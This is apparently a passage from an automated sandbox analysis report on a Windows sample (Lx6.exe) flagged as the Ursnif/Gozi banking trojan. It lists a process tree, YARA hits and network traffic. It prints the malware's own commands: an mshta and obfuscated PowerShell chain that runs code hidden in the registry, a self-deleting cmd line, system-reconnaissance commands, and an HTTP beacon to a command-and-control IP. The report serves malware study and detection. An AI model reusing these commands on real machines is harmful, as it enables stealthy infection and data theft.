a3 56 c5 7a 4e b8 6d fa d7 f7 c4 94 70 17 fe c5 d9 c3 2d e4 6f 2c 4a 36 3b 4f 85 b9 a3 df 9c 3d 04 fd d3 2c b6 7b 89 27 ac eb 85 f5 f2 e3 78 73 f8 06 00 c8 88 01 62 35 a3 49 2b 3b 5c 4e 6d cc 08 67 53 dc 87 49 e7 ec b7 8a a1 7e 10 6f 4c dc 49 93 d6 eb b7 64 5e 93 9f aa 84 8f a5 9c 17 84 5d cf 4e a1 55 c0 02 92 70 13 68 c7 9c b9 10 e5 1a 0d cf 2f 16 b7 4f d4 ce c5 1f 93 14 44 e1 5f 49 3d 92 54 11 76 9a c0 93 8b 67 f4 9c ba 8e 29 f6 21 3f d1 46 59 45 65 df 09 41 9e 95 10 08 ab 9b 38 39 bd f9 00 3f 33 34 af 87 7f b0 b8 3b 5b 62 5d 51 f1 e7 ec f0 43 62 b0 05 12 4b 11 f7 c0 43 0f 9f 49 39 c9 03 18 6f 1f dc 85 84 44 72 ce 2e e4 89 16 88 6c 1a 74 67 8b 40 13 f2 4c 14 b4 7a 9c 74 28 dc c8 ca 10 59 2b 6c cc bd 4b 3b f7 0b 17 1b d8 95 c0 37 94 91 d6 ec 50 94 e7 e8 2c 28 cc 7c f8 15 b0 75 c5 cb 93 31 fd 15 9e 25 7c 53 8b da e8 55 e7 67 f1 0b 3c 65 cc bf dd 0f 0d ea 79 ed 3a 68 a0 4c 3b 61 da f5 58 70 a0 89 9f 18 39 7d 1b b9 8f 8d 49 0d e4 65 4a 67 03 46 e2 e4 4b b3 65 f7 2d 0f 68 84 37 ba e3 d1 50 41 bc 62 4e b0 1b 4a f5 6c 6b 1f 26 c4 3a 0a a5 26 5a 4f 35 35 d3 ad 2d c7 01 b8 64 f5 da 25 9f d5 5a d6 f8 ab f8 d5 14 f6 9a 28 06 aa 55 80 9f 2a 51 6f cc 4d af 2a 88 bc f2 50 72 11 b5 7e e0 3b b8 f7 5f 5f f5 52 32 a3 be 70 4c 79 0a d8 45 5c b5 5b ca 11 2f 10 dd 20 02 f0 9e 2b 61 58 a2 58 98 51 bd b5 ba aa 6d 16 b7 12 8a 07 75 37 de c4 03 e4 5f 5e 3d fd 36 10 b5 43 5c e0 01 56 e1 69 af 3f a8 f6 01 19 4b 9d 5d 94 d4 2c 37 be 8d bb ea f5 d2 46 4e 2e 9d 07 42 f7 c9 05 4c 79 69 7e f5 a9 8e a9 34 5c 91 55 a1 97 56 63 b2 7e fd 01 72 7f 16 b1 9e df 83 ab 19 a5 9d 43 66 d2 f2 90 15 4f 7d 97 52 6c 3d c1 99 d4 0e c6 85 de f4 8c 29 66 fa 7b e5 9d 2e fa cf e5 86 ad 8f 34 42 ea 1f f6 8f 87 88 25 b0 fb 5e 42 65 a6 82 8e c1 a1 7c 2e fa cf 17 fb 88 77 32 ec e0 75 c5 0b 65 89 7e 8a d0 90 a4 19 db 19 80 d2 da c9 94 9d 11 cf 6c f6 ac 34 14 70 80 1d c1 e5 6e 38 a6 10 cb 18 cf 1a 7b 55 a6 0d 0b cf 05 40 55 cf 4b dd 45 12 dd 52 63 66 02 f2 08 80 62 e0 47 33 a0 5c 15 24 ee cb a4 d7 8d 34 d7 b2 ca 46 31 f9 d2 13 ca 33 8d ff 2d c2 b6 a9 f8 35 db 75 29 4a b5 06 3d 3e 8d de 11 39 f7 7d 71 0f 0a 3d d8 76 46 8a a3 9a 12 1d 80 0a dd 7d f3 0b d4 d3 ec 0e 76 4a de 0c c6 1e d6 89 e4 f7 eb 62 85 14 d0 f8 4c 07 a4 d1 Data Ascii: OI>$%_2hPdQG7dDxE-^_+L;=D<B=`MpawtU=VRFNfKjI8)]h_G%dGm[B?bH":ag{k%/tg6iQV"9-dVzNmp-o,J6;O=,{'xsb5I+;\NmgSI~oLId^]NUph/OD_I=Tvg)!?FYEeA89?34;[b]QCbKCI9oDr.ltg@Lzt(Y+lK;7P,(\|u1%\|SUg<ey:hL;aXp9}IeJgFKe-h7PAbNJlk&:&ZO55-d%Z(UQoMPr~;__R2pLyE\[/ +aXXQmu7_^=6C\Vi?K],7FN.BLyi~4\UVc~rCfO}Rl=)f{.4B%^Be\|.w2ue~l4pn8{U@UKERcfbG3\$4F13-5u)J=>9}q=vF}vJbL
Oct 11, 2022 15:05:22.646934032 CEST	2020	OUT	GET /doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 194.76.225.61 Content-Length: 54 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 31 31 2d 31 30 2d 32 30 32 32 20 31 35 3a 30 34 3a 32 35 20 7c 20 22 30 78 61 61 61 34 39 34 65 37 5f 36 33 31 34 63 64 34 36 63 34 66 66 35 22 20 7c 20 30 0d 0a Data Ascii: 11-10-2022 15:04:25 \| "0xaaa494e7_6314cd46c4ff5" \| 0
Oct 11, 2022 15:05:22.864103079 CEST	2021	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:05:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:01:17
Start date:	11/10/2022
Path:	C:\Users\user\Desktop\Lx6.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Lx6.exe
Imagebase:	0x400000
File size:	38400 bytes
MD5 hash:	3B892BEA0F8CBE0B61EE380743567D1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Analysis Process: mshta.exePID: 6016, Parent PID: 3528

General

Target ID:	3
Start time:	15:02:02
Start date:	11/10/2022
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ccqf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ccqf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Imagebase:	0x7ff632220000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exePID: 4292, Parent PID: 6016

General

Target ID:	4
Start time:	15:02:04
Start date:	11/10/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Imagebase:	0x7ff635980000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: conhost.exePID: 5672, Parent PID: 4292

General

Target ID:	5
Start time:	15:02:04
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: csc.exePID: 1264, Parent PID: 4292

General

Target ID:	8
Start time:	15:02:16
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Imagebase:	0x7ff707330000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: cvtres.exePID: 1312, Parent PID: 1264

General

Target ID:	9
Start time:	15:02:17
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP"
Imagebase:	0x7ff77b170000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: csc.exePID: 1236, Parent PID: 4292

General

Target ID:	10
Start time:	15:02:19
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Imagebase:	0x7ff707330000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: cvtres.exePID: 5024, Parent PID: 1236

General

Target ID:	11
Start time:	15:02:20
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP"
Imagebase:	0x7ff77b170000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: control.exePID: 3692, Parent PID: 1172

General

Target ID:	12
Start time:	15:02:23
Start date:	11/10/2022
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff712ea0000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exePID: 4672, Parent PID: 3692

General

Target ID:	13
Start time:	15:02:26
Start date:	11/10/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff63f840000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: explorer.exePID: 3528, Parent PID: 4292

General

Target ID:	14
Start time:	15:02:29
Start date:	11/10/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff618f60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 5656, Parent PID: 3528

General

Target ID:	15
Start time:	15:02:46
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 4180, Parent PID: 5656

General

Target ID:	16
Start time:	15:02:46
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: PING.EXEPID: 5948, Parent PID: 5656

General

Target ID:	17
Start time:	15:02:46
Start date:	11/10/2022
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 5
Imagebase:	0x7ff61b200000
File size:	21504 bytes
MD5 hash:	6A7389ECE70FB97BFE9A570DB4ACCC3B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: RuntimeBroker.exePID: 3124, Parent PID: 3528

General

Target ID:	19
Start time:	15:03:14
Start date:	11/10/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6992e0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Analysis Process: cmd.exePID: 5760, Parent PID: 3528

General

Target ID:	20
Start time:	15:03:20
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic computersystem get domain \|more > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 2760, Parent PID: 5760

General

Target ID:	22
Start time:	15:03:22
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: WMIC.exePID: 5296, Parent PID: 5760

General

Target ID:	23
Start time:	15:03:23
Start date:	11/10/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get domain
Imagebase:	0x7ff6b8e40000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: more.comPID: 5996, Parent PID: 5760

General

Target ID:	25
Start time:	15:03:23
Start date:	11/10/2022
Path:	C:\Windows\System32\more.com
Wow64 process (32bit):	false
Commandline:	more
Imagebase:	0x7ff68a6e0000
File size:	28160 bytes
MD5 hash:	28E3DD812331E39AFC3C2B30606E2971
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 2176, Parent PID: 3528

General

Target ID:	26
Start time:	15:03:35
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff6ac650000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: RuntimeBroker.exePID: 4372, Parent PID: 3528

General

Target ID:	27
Start time:	15:03:35
Start date:	11/10/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6992e0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Analysis Process: conhost.exePID: 5604, Parent PID: 2176

General

Target ID:	28
Start time:	15:03:41
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 3960, Parent PID: 3528

General

Target ID:	29
Start time:	15:03:44
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 5128, Parent PID: 3960

General

Target ID:	30
Start time:	15:03:53
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: RuntimeBroker.exePID: 4552, Parent PID: 3528

General

Target ID:	31
Start time:	15:03:53
Start date:	11/10/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6992e0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Analysis Process: systeminfo.exePID: 5140, Parent PID: 3960

General

Target ID:	32
Start time:	15:03:53
Start date:	11/10/2022
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo.exe
Imagebase:	0x7ff645c00000
File size:	100864 bytes
MD5 hash:	57D183270FD28D0EBF6C2966FE450739
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

